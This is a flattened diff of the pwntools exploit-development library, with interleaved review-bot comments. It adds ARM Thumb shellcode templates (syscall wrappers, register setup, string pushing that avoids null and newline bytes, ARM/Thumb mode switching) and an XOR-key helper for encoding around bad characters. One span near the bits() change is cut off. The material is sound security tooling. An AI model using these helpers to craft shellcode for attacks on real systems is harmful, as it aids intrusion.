index 000000000..1328183c1 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/vhangup.asm b/pwnlib/shellcraft/templates/thumb/linux/vhangup.asm new file mode 100644 index 000000000..6c13ec7eb --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/vhangup.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/vmsplice.asm b/pwnlib/shellcraft/templates/thumb/linux/vmsplice.asm new file mode 100644 index 000000000..6e2e558ef --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/wait4.asm b/pwnlib/shellcraft/templates/thumb/linux/wait4.asm new file mode 100644 index 000000000..3fe5fe470 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/waitid.asm b/pwnlib/shellcraft/templates/thumb/linux/waitid.asm new file mode 100644 index 000000000..4ae8c0f09 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/waitid.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/waitpid.asm b/pwnlib/shellcraft/templates/thumb/linux/waitpid.asm new file mode 100644 index 000000000..80a773a45 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/write.asm b/pwnlib/shellcraft/templates/thumb/linux/write.asm new file mode 100644 index 000000000..688111985 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/writev.asm b/pwnlib/shellcraft/templates/thumb/linux/writev.asm new file mode 100644 index 000000000..6dc63d5b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/writev.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/thumb/memcpy.asm b/pwnlib/shellcraft/templates/thumb/memcpy.asm new file mode 100644 index 000000000..250555c40 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/memcpy.asm @@ -0,0 +1,19 @@ +<% from pwnlib.shellcraft import thumb, pretty, common %> +<%docstring>Copies memory. + +Args: + dest: Destination address + src: Source address + n: Number of bytes + +<%page args="dest, src, n"/> +<% +memcpy_loop = common.label("memcpy_loop") +%> + /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ + ${thumb.setregs({'r4': dest, 'r1': src, 'r2': n})} +${memcpy_loop}: + ldrb r3, [r1], #1 + strb r3, [r4], #1 + subs r2, r2, #1 + bge ${memcpy_loop} diff --git a/pwnlib/shellcraft/templates/thumb/mov.asm b/pwnlib/shellcraft/templates/thumb/mov.asm index e09d05ed0..accea458e 100644 --- a/pwnlib/shellcraft/templates/thumb/mov.asm +++ b/pwnlib/shellcraft/templates/thumb/mov.asm @@ -1,6 +1,7 @@ <% - from pwnlib.shellcraft import common - from pwnlib import constants + from pwnlib.shellcraft import eval, common, pretty, okay, registers + from pwnlib.log import getLogger + from pwnlib.util import fiddling from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context %> <%page args="dst, src"/> 
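Review bot: The loop in memcpy.asm copies n+1 bytes: r2 starts at `n`, `subs r2, r2, #1` runs after each byte and `bge` loops while the result is still non-negative, so for n=1 the body executes twice and for n=0 it still writes one byte past the requested range. Decrementing before the copy and leaving on a negative result fixes both ends; the rewrite below needs a second label from `common.label`. As far as I can tell the post-indexed `ldrb r3, [r1], #1` / `strb r3, [r4], #1` forms only exist as 32-bit Thumb-2 encodings, so a short comment that the template assumes Thumb-2 would save a surprise on Thumb-1-only cores. The writev.asm and mov.asm import hunks on this line raise nothing.
```asm
<%
memcpy_loop = common.label("memcpy_loop")
memcpy_done = common.label("memcpy_done")
%>
    /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */
    ${thumb.setregs({'r4': dest, 'r1': src, 'r2': n})}
${memcpy_loop}:
    subs r2, r2, #1
    bmi ${memcpy_done}
    ldrb r3, [r1], #1
    strb r3, [r4], #1
    b ${memcpy_loop}
${memcpy_done}:
```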
@@ -17,47 +18,94 @@ Example: - >>> print shellcraft.thumb.mov('r1','r2').rstrip() - mov r1, r2 - >>> print shellcraft.thumb.mov('r1', 0).rstrip() - eor r1, r1 - >>> print shellcraft.thumb.mov('r1', 10).rstrip() - mov r1, #10 - >>> print shellcraft.thumb.mov('r1', 17).rstrip() - mov r1, #17 - >>> print shellcraft.thumb.mov('r1', 'r1').rstrip() - /* moving r1 into r1, but this is a no-op */ - >>> print shellcraft.thumb.mov('r1', 0xdead00ff).rstrip() - ldr r1, value_... - b value_..._after - value_...: .word 3735879935 - value_..._after: - >>> with context.local(os = 'linux'): - ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() - mov r1, #(SYS_execve) - >>> with context.local(os = 'freebsd'): - ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() - mov r1, #(SYS_execve) - >>> with context.local(os = 'linux'): - ... print shellcraft.thumb.mov('r1', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() - mov r1, #(PROT_READ | PROT_WRITE | PROT_EXEC) + >>> print shellcraft.thumb.mov('r1','r2').rstrip() + mov r1, r2 + >>> print shellcraft.thumb.mov('r1', 0).rstrip() + eor r1, r1 + >>> print shellcraft.thumb.mov('r1', 10).rstrip() + mov r1, #0xa + 1 + sub r1, r1, 1 + >>> print shellcraft.thumb.mov('r1', 17).rstrip() + mov r1, #0x11 + >>> print shellcraft.thumb.mov('r1', 'r1').rstrip() + /* moving r1 into r1, but this is a no-op */ + >>> print shellcraft.thumb.mov('r1', 512).rstrip() + mov r1, #0x200 + >>> print shellcraft.thumb.mov('r1', 0x10000001).rstrip() + mov r1, #(0x10000001 >> 28) + lsl r1, #28 + add r1, #(0x10000001 & 0xff) + >>> print shellcraft.thumb.mov('r1', 0xdead0000).rstrip() + mov r1, #(0xdead0000 >> 25) + lsl r1, #(25 - 16) + add r1, #((0xdead0000 >> 16) & 0xff) + lsl r1, #16 + >>> print shellcraft.thumb.mov('r1', 0xdead00ff).rstrip() + ldr r1, value_... + b value_..._after + value_...: .word 0xdead00ff + value_..._after: + >>> with context.local(os = 'linux'): + ... 
print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() + mov r1, #(SYS_execve) /* 0xb */ + >>> with context.local(os = 'freebsd'): + ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() + mov r1, #(SYS_execve) /* 0x3b */ + >>> with context.local(os = 'linux'): + ... print shellcraft.thumb.mov('r1', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() + mov r1, #(PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ <% -all_regs = ['r' + str(n) for n in range(16)] + ['sp', 'fp', 'pc', 'lr'] +log = getLogger(__name__) src_orig = src if isinstance(src, (str, unicode)): src = src.strip() - if src.lower() in all_regs: + if src.lower() in registers.arm: src = src.lower() else: with ctx.local(arch = 'thumb'): try: - src = constants.eval(src) + src = eval(src) except (AttributeError, ValueError): log.error("Could not figure out the value of %r" % src) return +# ARM has a mov-const-with-shift +# As long as the const fits in 8 bits, everything works out :) +def get_imm8_shift_ok(v): + v_bits = fiddling.bits(v) + retval = 0 + + if v == 0: + return 1 + + trailing_zeroes = v_bits[::-1].index(1) + leading_zeroes = v_bits.index(1) + width = len(v_bits) - leading_zeroes - trailing_zeroes + + if width > 8: + return 0 + + retval = v >> trailing_zeroes + + if width > 8 \ + or not okay(retval, bits=8) \ + or (width == 8 and 0 != (trailing_zeroes % 2)): + return 0 + + return retval + +positive_imm8_shift = False +negative_imm8_shift = False +srcn = None +if not src in registers.arm: + src = eval(src) + srcu = src & 0xffffffff + srcn = fiddling.negate(src + 1) + positive_imm8_shift = get_imm8_shift_ok(srcu) + negative_imm8_shift = get_imm8_shift_ok(srcn) + %> % if dst == src: /* moving ${src} into ${dst}, but this is a no-op */ 
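Review bot: In `get_imm8_shift_ok` the `if width > 8: return 0` test is repeated inside the second `if`, and the `return 1` for `v == 0` makes the helper's result double as a flag and as a shifted constant, although the two callers in this hunk (`positive_imm8_shift`, `negative_imm8_shift`) only ever test it for truthiness; returning a plain bool and dropping the duplicate check would make the intent clearer. The `width == 8 and 0 != (trailing_zeroes % 2)` rule is the A32 even-rotation constraint; Thumb-2 modified immediates accept an 8-bit pattern at any shift, so for `.thumb` output this is conservative (it only costs extra instructions, never a wrong value) and a comment saying so would stop the next reader from "fixing" it. `srcn = fiddling.negate(src + 1)` appears intended as the bitwise complement of `src`; a comment such as `# ~src as an unsigned 32-bit value, for the mvn path` would document that, since the value is later emitted inside an `mvn`.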
@@ -70,8 +118,16 @@ if isinstance(src, (str, unicode)): %>\ %if srcu == 0: eor ${dst}, ${dst} - %elif srcu < 256: - mov ${dst}, #${src} + %elif srcu == 10: + mov ${dst}, #${pretty(src)} + 1 + sub ${dst}, ${dst}, 1 + %elif srcs == -10: + mov ${dst}, #${pretty(src)} + 1 + sub ${dst}, ${dst}, 1 + %elif positive_imm8_shift and srcu != 10: + mov ${dst}, #${pretty(src)} + %elif negative_imm8_shift and srcn != 10: + mvn ${dst}, #-${pretty(srcn)} %elif -256 < srcs < 0: eor ${dst}, ${dst} sub ${dst}, #${-srcs} @@ -83,11 +139,11 @@ if isinstance(src, (str, unicode)): %>\ %if (0xff << shift1) & src == src: %if shift1 < 4: - mov ${dst}, #${src >> shift1} + mov ${dst}, #(${pretty(src)} >> ${shift1}) lsl ${dst}, #4 - lsr ${dst}, #{4 - shift1} + lsr ${dst}, #(4 - ${shift1}) %else: - mov ${dst}, #${src >> shift1} + mov ${dst}, #(${pretty(src)} >> ${shift1}) lsl ${dst}, #${shift1} %endif %else: @@ -97,9 +153,9 @@ if isinstance(src, (str, unicode)): shift2 += 1 %>\ %if ((0xff << shift2) | 0xff) & src == src: - mov ${dst}, #${src >> shift2} + mov ${dst}, #(${pretty(src)} >> ${shift2}) lsl ${dst}, #${shift2} - add ${dst}, #${src & 0xff} + add ${dst}, #(${"%#x" % src} & 0xff) %else: <% shift3 = shift1 + 8 @@ -107,26 +163,26 @@ if isinstance(src, (str, unicode)): shift3 += 1 %>\ %if ((0xff << shift1) | (0xff << shift3)) & src == src: - mov ${dst}, #${src >> shift3} - lsl ${dst}, #${shift3 - shift1} - add ${dst}, #${(src >> shift1) & 0xff} + mov ${dst}, #(${pretty(src)} >> ${shift3}) + lsl ${dst}, #(${shift3} - ${shift1}) + add ${dst}, #((${pretty(src)} >> ${shift1}) & 0xff) lsl ${dst}, #${shift1} %else: <% id = common.label("value") - extra = '' + shift = False if (src & 0xff000000 == 0): + shift = True src = src | 0xff000000 - extra = '\n '.join([ - "lsl %s, #8" % dst, - "lsr %s, #8" % dst - ]) %>\ ldr ${dst}, ${id} b ${id}_after - ${id}: .word ${src} + ${id}: .word ${pretty(src)} ${id}_after: - ${extra} + %if shift: + lsl ${dst}, #8 + lsr ${dst}, #8 + %endif %endif %endif %endif 
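Review bot: The new `mvn ${dst}, #-${pretty(srcn)}` branch looks sign-inverted: if `srcn` is the two's-complement negation of `src + 1` (i.e. `~src` as an unsigned value, which is what the name and the use of `mvn` suggest), then `mvn dst, #srcn` yields `src`, whereas `#-srcn` asks the assembler for `~(-srcn)`, a different value — for `src = -256` the branch is reached with `srcn = 0xff` and emits `mvn r1, #-0xff`. None of the doctests in this file exercise the branch; adding `>>> print shellcraft.thumb.mov('r1', -256).rstrip()` with the expected `mvn r1, #0xff` would settle it either way. The `srcu == 10` / `srcs == -10` special cases exist to keep a 0x0a (newline) byte out of the encoding; a `/* 10 == '\n', avoid it in the immediate */` comment on the first one would make the reason obvious.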
diff --git a/pwnlib/shellcraft/templates/thumb/popad.asm b/pwnlib/shellcraft/templates/thumb/popad.asm new file mode 100644 index 000000000..a54f30d46 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/popad.asm @@ -0,0 +1,6 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Pop all of the registers onto the stack which i386 popad does, +in the same order. + + pop {r0-r12} diff --git a/pwnlib/shellcraft/templates/thumb/push.asm b/pwnlib/shellcraft/templates/thumb/push.asm index 7057de000..5c0381adc 100644 --- a/pwnlib/shellcraft/templates/thumb/push.asm +++ b/pwnlib/shellcraft/templates/thumb/push.asm @@ -1,6 +1,6 @@ <% from pwnlib.util import packing - from pwnlib.shellcraft import thumb + from pwnlib.shellcraft import thumb, registers from pwnlib import constants from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context import re 
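Review bot: popad.asm's docstring says it pops registers "onto the stack", which is the pushad wording carried over; it should read `Pop all of the registers off of the stack which i386 popad does, in the same order.` The `from pwnlib.shellcraft import amd64` import at the top of the template is unused. A `pop {r0-r12}` that includes registers above r7 only exists as the 32-bit Thumb-2 `pop.w` encoding, so a one-line comment that the template assumes Thumb-2 would avoid a surprise on Thumb-1-only targets. The push.asm import hunk on this line raises nothing.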
@@ -20,42 +20,46 @@ Args: Example: + >>> print pwnlib.shellcraft.thumb.push('r0').rstrip() + push {r0} >>> print pwnlib.shellcraft.thumb.push(0).rstrip() /* push 0 */ - eor r1, r1 - push {r1} + eor r7, r7 + push {r7} >>> print pwnlib.shellcraft.thumb.push(1).rstrip() /* push 1 */ - mov r1, #1 - push {r1} + mov r7, #1 + push {r7} >>> print pwnlib.shellcraft.thumb.push(256).rstrip() /* push 256 */ - mov r1, #1 - lsl r1, #8 - push {r1} - >>> with context.local(os = 'linux'): - ... print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() + mov r7, #0x100 + push {r7} + >>> print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() /* push 'SYS_execve' */ - mov r1, #11 - push {r1} + mov r7, #0xb + push {r7} >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() /* push 'SYS_execve' */ - mov r1, #59 - push {r1} + mov r7, #0x3b + push {r7} <% - value_orig = value - if isinstance(value, (str, unicode)): +value_orig = value +is_register = value in registers.arm + +if not is_register and isinstance(value, (str, unicode)): try: - with ctx.local(arch = 'thumb'): - value = constants.eval(value) - except (ValueError, AttributeError): - pass + with ctx.local(arch = 'thumb'): + value = constants.eval(value) + except (ValueError, AttributeError, NameError): + pass %> -% if isinstance(value, (int,long)): +% if is_register: + push {${value}} +% elif isinstance(value, (int,long)): /* push ${repr(value_orig)} */ ${re.sub(r'^\s*/.*\n', '', thumb.pushstr(packing.pack(value), False), 1)} % else: diff --git a/pwnlib/shellcraft/templates/thumb/pushad.asm b/pwnlib/shellcraft/templates/thumb/pushad.asm new file mode 100644 index 000000000..84d20bd67 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/pushad.asm @@ -0,0 +1,6 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Push all of the registers onto the stack which i386 pushad does, +in the same order. + + push {r0-r12} 
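Review bot: push.asm now uses r7 as the scratch register for non-register values (every updated doctest shows `mov r7, ...` / `push {r7}` where the old output used r1), and r7 is where the Linux ARM syscall number lives, so a `push(...)` emitted between a `mov r7, #SYS_x` and the `svc` silently corrupts the call; the Args section of the docstring (outside this hunk) should gain `Note: r7 is clobbered when value is not a register name.` The `SYS_execve` doctest also lost its `with context.local(os = 'linux'):` wrapper, so it now depends on the ambient `context.os` being linux — restoring the wrapper keeps the test self-contained. The pushad.asm hunk on this line carries the same unused `amd64` import as popad.asm.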
diff --git a/pwnlib/shellcraft/templates/thumb/pushstr.asm b/pwnlib/shellcraft/templates/thumb/pushstr.asm index 2020912ec..123ad7653 100644 --- a/pwnlib/shellcraft/templates/thumb/pushstr.asm +++ b/pwnlib/shellcraft/templates/thumb/pushstr.asm @@ -2,7 +2,7 @@ from pwnlib.shellcraft import thumb from pwnlib.util import lists, packing %> -<%page args="string, append_null = True"/> +<%page args="string, append_null = True, register = 'r7'"/> <%docstring> Pushes a string onto the stack without using null bytes or newline characters. @@ -12,18 +12,25 @@ Args: append_null (bool): Whether to append a single NULL-byte before pushing. Examples: - >>>> with context.local(): - ... context.arch = 'thumb' - ... print enhex(asm(shellcraft.pushstr('Hello\nWorld!', True))) - 81ea010102b4dff8041001e0726c642102b4dff8041001e06f0a576f02b4dff8041001e048656c6c02b4 - >>>> with context.local(): - ... context.arch = 'thumb' - ... print enhex(asm(shellcraft.pushstr('', True))) - 81ea010102b4 - >>>> with context.local(): - ... context.arch = 'thumb' - ... print enhex(asm(shellcraft.pushstr('\x00', False))) - 81ea010102b4 + +Note that this doctest has two possibilities for the first result, depending +on your version of binutils. + + >>> enhex(asm(shellcraft.pushstr('Hello\nWorld!', True))) in [ + ... '87ea070780b4dff8047001e0726c642180b4dff8047001e06f0a576f80b4dff8047001e048656c6c80b4', + ... '87ea070780b4dff8067000f002b8726c642180b4dff8047000f002b86f0a576f80b4014f00f002b848656c6c80b4'] + True + >>> print shellcraft.pushstr('abc').rstrip() #doctest: +ELLIPSIS + /* push 'abc\x00' */ + ldr r7, value_... + b value_..._after + value_...: .word 0xff636261 + value_..._after: + lsl r7, #8 + lsr r7, #8 + push {r7} + >>> print enhex(asm(shellcraft.pushstr('\x00', False))) + 87ea070780b4 <% 
@@ -32,9 +39,12 @@ Examples: if not string: return + offset = len(string) + while offset % 4: + offset += 1 %>\ /* push ${repr(string)} */ % for word in lists.group(4, string, 'fill', '\x00')[::-1]: - ${thumb.mov('r1', packing.unpack(word))} - push {r1} + ${thumb.mov(register, packing.unpack(word))} + push {${register}} % endfor diff --git a/pwnlib/shellcraft/templates/thumb/setregs.asm b/pwnlib/shellcraft/templates/thumb/setregs.asm new file mode 100644 index 000000000..dc01551c8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/setregs.asm @@ -0,0 +1,43 @@ +<% + from pwnlib.regsort import regsort + from pwnlib.constants import Constant, eval + from pwnlib.shellcraft import registers + from pwnlib.shellcraft.thumb import mov +%> +<%page args="reg_context, stack_allowed = True"/> +<%docstring> +Sets multiple registers, taking any register dependencies into account +(i.e., given eax=1,ebx=eax, set ebx first). + +Args: + reg_context (dict): Desired register context + stack_allowed (bool): Can the stack be used? + +Example: + + >>> print shellcraft.setregs({'r0':1, 'r2':'r3'}).rstrip() + mov r0, #1 + mov r2, r3 + >>> print shellcraft.setregs({'r0':'r1', 'r1':'r0', 'r2':'r3'}).rstrip() + mov r2, r3 + eor r0, r0, r1 /* xchg r0, r1 */ + eor r1, r0, r1 + eor r0, r0, r1 + +<% +reg_context = {k:v for k,v in reg_context.items() if v is not None} +sorted_regs = regsort(reg_context, registers.arm) +%> +% if not sorted_regs: + /* setregs noop */ +% else: +% for how, dst, src in regsort(reg_context, registers.arm): +% if how == 'xchg': + eor ${dst}, ${dst}, ${src} /* xchg ${dst}, ${src} */ + eor ${src}, ${dst}, ${src} + eor ${dst}, ${dst}, ${src} +% else: + ${mov(dst, src)} +% endif +% endfor +% endif diff --git a/pwnlib/shellcraft/templates/thumb/to_arm.asm b/pwnlib/shellcraft/templates/thumb/to_arm.asm new file mode 100644 index 000000000..604cba285 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/to_arm.asm 
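Review bot: The `offset` computed at the top of this hunk (`offset = len(string)` rounded up to a multiple of 4) is never used afterwards — the loop below relies on `lists.group(4, string, 'fill', '\x00')` for padding — so it is dead code and should be removed or put to use. The new `register` page argument added in the first hunk of this file is not described in the docstring's Args section; add `register (str): Scratch register used to build each word; defaults to r7.` Because r7 carries the Linux ARM syscall number, that entry should also warn that it is clobbered unless the caller passes a different register.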
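Review bot: setregs.asm computes `regsort(reg_context, registers.arm)` into `sorted_regs` and then calls it a second time in the `% for` header; iterating `sorted_regs` avoids the duplicate work and guarantees the emptiness check and the loop body see the same ordering. `stack_allowed` is accepted but never read in this template; either document it as reserved for interface parity with the x86 templates (`stack_allowed (bool): Unused on ARM; kept for interface compatibility`) or drop it. The docstring's parenthetical "given eax=1,ebx=eax, set ebx first" is x86 wording — `given r0=1, r1=r0, set r1 first` would match the examples below it.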
@@ -0,0 +1,23 @@ +<% + from random import choice + from pwnlib.shellcraft import registers +%> +<%docstring>Go from THUMB to ARM mode. +<%page args="reg=None, avoid = []"/> +<% + if reg: + pass + elif not avoid or 'r3' not in avoid: + reg = 'r3' + else: + # Avoid registers we don't want to clobber, and r0 + # since it will encode a NULL. + avoid = set(avoid) | {'r0', 'sp', 'pc', 'cpsr', 'lr'} + reg = next(r for r in registers.arm if r not in avoid) +%> + .thumb + add ${reg}, pc, #4 + bx ${reg} + nop + .arm + diff --git a/pwnlib/shellcraft/templates/thumb/trap.asm b/pwnlib/shellcraft/templates/thumb/trap.asm new file mode 100644 index 000000000..d9c40dcf5 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/trap.asm @@ -0,0 +1,2 @@ +<%docstring>A trap instruction. + BKPT diff --git a/pwnlib/shellcraft/templates/thumb/udiv_10.asm b/pwnlib/shellcraft/templates/thumb/udiv_10.asm new file mode 100644 index 000000000..d32b72729 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/udiv_10.asm @@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft import arm +%> +<%page args="N"/> +<%docstring> +Divides r0 by 10. Result is stored in r0, N and Z flags are updated. + +Code is from generated from here: + https://raw.githubusercontent.com/rofirrim/raspberry-pi-assembler/master/chapter15/magic.py + +With code: + python magic.py 10 code_for_unsigned + + /* r0 = ${N} / 10 */ + ${arm.setregs({'r0': N, 'r1': 0xcccccccd})} + umull r1, r2, r0, r1 /* r1 <- Lower32Bits(r1*r0). r2 <- Upper32Bits(r1*r0) */ + movs r0, r2, LSR #3 /* r0 <- r2 >> 3 */ diff --git a/pwnlib/tubes/process.py b/pwnlib/tubes/process.py index d16154535..e494be0f1 100644 --- a/pwnlib/tubes/process.py +++ b/pwnlib/tubes/process.py 
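Review bot: The ARM code that follows `.arm` in to_arm.asm must be word-aligned, but nothing in the template aligns it: Thumb `add ${reg}, pc, #4` resolves against Align(PC,4), so with `add`/`bx`/`nop` occupying six bytes the `bx` target and the first ARM instruction only coincide when the fragment starts at a 2-mod-4 offset (unless the assembler pads on the mode switch, which I would not rely on). Emitting `.align 2` between the `nop` and `.arm`, and a doctest that assembles the fragment at both alignments, would make the transition independent of placement. `elif not avoid or 'r3' not in avoid` simplifies to `elif 'r3' not in avoid`, and the `avoid = []` mutable default is safe here only because the body rebinds it (`avoid = set(avoid) | {...}`) rather than mutating it — worth a comment. `from random import choice` is unused.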
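Review bot: udiv_10.asm sits under `thumb/` but imports `pwnlib.shellcraft.arm` and emits `arm.setregs(...)`, so the constant loads come from the ARM `mov` template rather than the Thumb one; use `thumb.setregs` or explain in a comment why the ARM variant is wanted here. The docstring says "Divides r0 by 10" although the page takes `N` and loads it into r0 first, and "Code is from generated from" has a stray word; a first line such as `Divides ${N} by 10; the quotient is left in r0 and the N/Z flags are updated (r1 and r2 are clobbered).` matches the body. `umull` and the shifted-operand `movs r0, r2, LSR #3` are 32-bit forms (the latter is `lsrs r0, r2, #3` in Thumb-2 unified syntax), which is worth noting if this is expected to assemble under `.thumb`.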
@@ -352,12 +352,18 @@ def kill(self): self.close() - def poll(self): - """poll() -> int + def poll(self, block = False): + """poll(block = False) -> int + + Arguments: + block(bool): Wait for the process to exit Poll the exit code of the process. Will return None, if the process has not yet finished and the exit code otherwise. """ + if block: + self.wait_for_close() + self.proc.poll() if self.proc.returncode != None and not self._stop_noticed: self._stop_noticed = True diff --git a/pwnlib/tubes/tube.py b/pwnlib/tubes/tube.py index 212ed584e..6ccdeb273 100644 --- a/pwnlib/tubes/tube.py +++ b/pwnlib/tubes/tube.py @@ -228,8 +228,8 @@ def recvn(self, numb, timeout = default): >>> t.recv_raw = lambda *a: time.sleep(0.01) or 'a' >>> t.recvn(10, timeout=0.05) '' - >>> t.recvn(10, timeout=0.05) - 'aaaaaaaaaa' + >>> t.recvn(10, timeout=0.06) # doctest: +ELLIPSIS + 'aaaaaa...' """ # Keep track of how much data has been received # It will be pasted together at the end if a diff --git a/pwnlib/util/fiddling.py b/pwnlib/util/fiddling.py index ea4072bf1..2ffd85014 100644 --- a/pwnlib/util/fiddling.py +++ b/pwnlib/util/fiddling.py @@ -7,9 +7,11 @@ from . import lists from . import packing from ..context import context +from ..log import getLogger from ..term import text from .cyclic import cyclic_find +log = getLogger(__name__) def unhex(s): r"""unhex(s) -> str 
@@ -107,7 +109,8 @@ def bits(s, endian = 'big', zero = 0, one = 1): >>> sum(bits("test")) 17 """ - + if s < 0: + s = s & ((1< None or (int, str) + + Finds a ``size``-width value that can be XORed with a string + to produce ``data``, while neither the XOR value or XOR string + contain any bytes in ``avoid``. + + Arguments: + data (str): The desired string. + avoid: The list of disallowed characters. Defaults to nulls and newlines. + size (int): Size of the desired output value, default is word size. + + Returns: + A tuple containing two strings; the XOR key and the XOR string. + If no such pair exists, None is returned. + + Example: + + >>> xor_key("Hello, world") + ('\x01\x01\x01\x01', 'Idmmn-!vnsme') + """ + size = size or context.bytes + + if len(data) % size: + log.error("Data must be padded to size for xor_key") + + words = lists.group(size, data) + columns = [''] * size + for word in words: + for i,byte in enumerate(word): + columns[i] += byte + + alphabet = list(chr(n) for n in range(256) if chr(n) not in avoid) + + result = '' + + for column in columns: + if context.randomize: + random.shuffle(alphabet) + for c2 in alphabet: + if all(chr(ord(c)^ord(c2)) in alphabet for c in column): + result += c2 + break + else: + return None + + return result, xor(data, result) def randoms(count, alphabet = string.lowercase): """randoms(count, alphabet = string.lowercase) -> str @@ -470,6 +522,7 @@ def _hexiichar(c): 'marker': text.gray if text.has_gray else text.blue, 'nonprintable': text.gray if text.has_gray else text.blue, '00': text.red, + '0a': text.red, 'ff': text.green, } diff --git a/pwnlib/util/getdents.py b/pwnlib/util/getdents.py new file mode 100644 index 000000000..919e315ba --- /dev/null +++ b/pwnlib/util/getdents.py 
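Review bot: The signature line in xor_key's docstring, `-> None or (int, str)`, does not match what the function returns: `result` is built as a str (`result += c2`) and the return is `(result, xor(data, result))`, as the example `('\x01\x01\x01\x01', 'Idmmn-!vnsme')` shows — it should read `-> (str, str) or None`, and the Returns text should say "the XOR key and the XORed data". `random.shuffle(alphabet)` runs under `context.randomize`, but the import hunk earlier in this file only adds `getLogger`; make sure `random` is already imported at module level, since that branch is the one not covered by the doctest. The per-byte `in alphabet` membership tests run against a list; building `allowed = set(alphabet)` once and testing against it keeps the search cheap for longer inputs. The start of this hunk (the `bits()` change) is truncated in this rendering, so I cannot review it.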
@@ -0,0 +1,57 @@
+from ..context import context
+from .packing import unpack
+from .fiddling import hexdump
+class linux_dirent(object):
+ def __init__(self, buf):
+ n = context.bytes
+
+ # Long
+ self.d_ino = unpack(buf[:n])
+ buf=buf[n:]
+
+ # Long
+ self.d_off = unpack(buf[:n])
+ buf=buf[n:]
+
+ # Short
+ self.d_reclen = unpack(buf[:2], 16)
+ buf=buf[2:]
+
+ # Name
+ self.d_name = buf[:buf.index('\x00')]
+
+ def __len__(self):
+ return self.d_reclen # 2 * context.bytes + 2 + len(self.d_name) + 1
+
+ def __str__(self):
+ return "inode=%i %r" % (self.d_ino, self.d_name)
+
+def dirents(buf):
+ """unpack_dents(buf) -> list
+
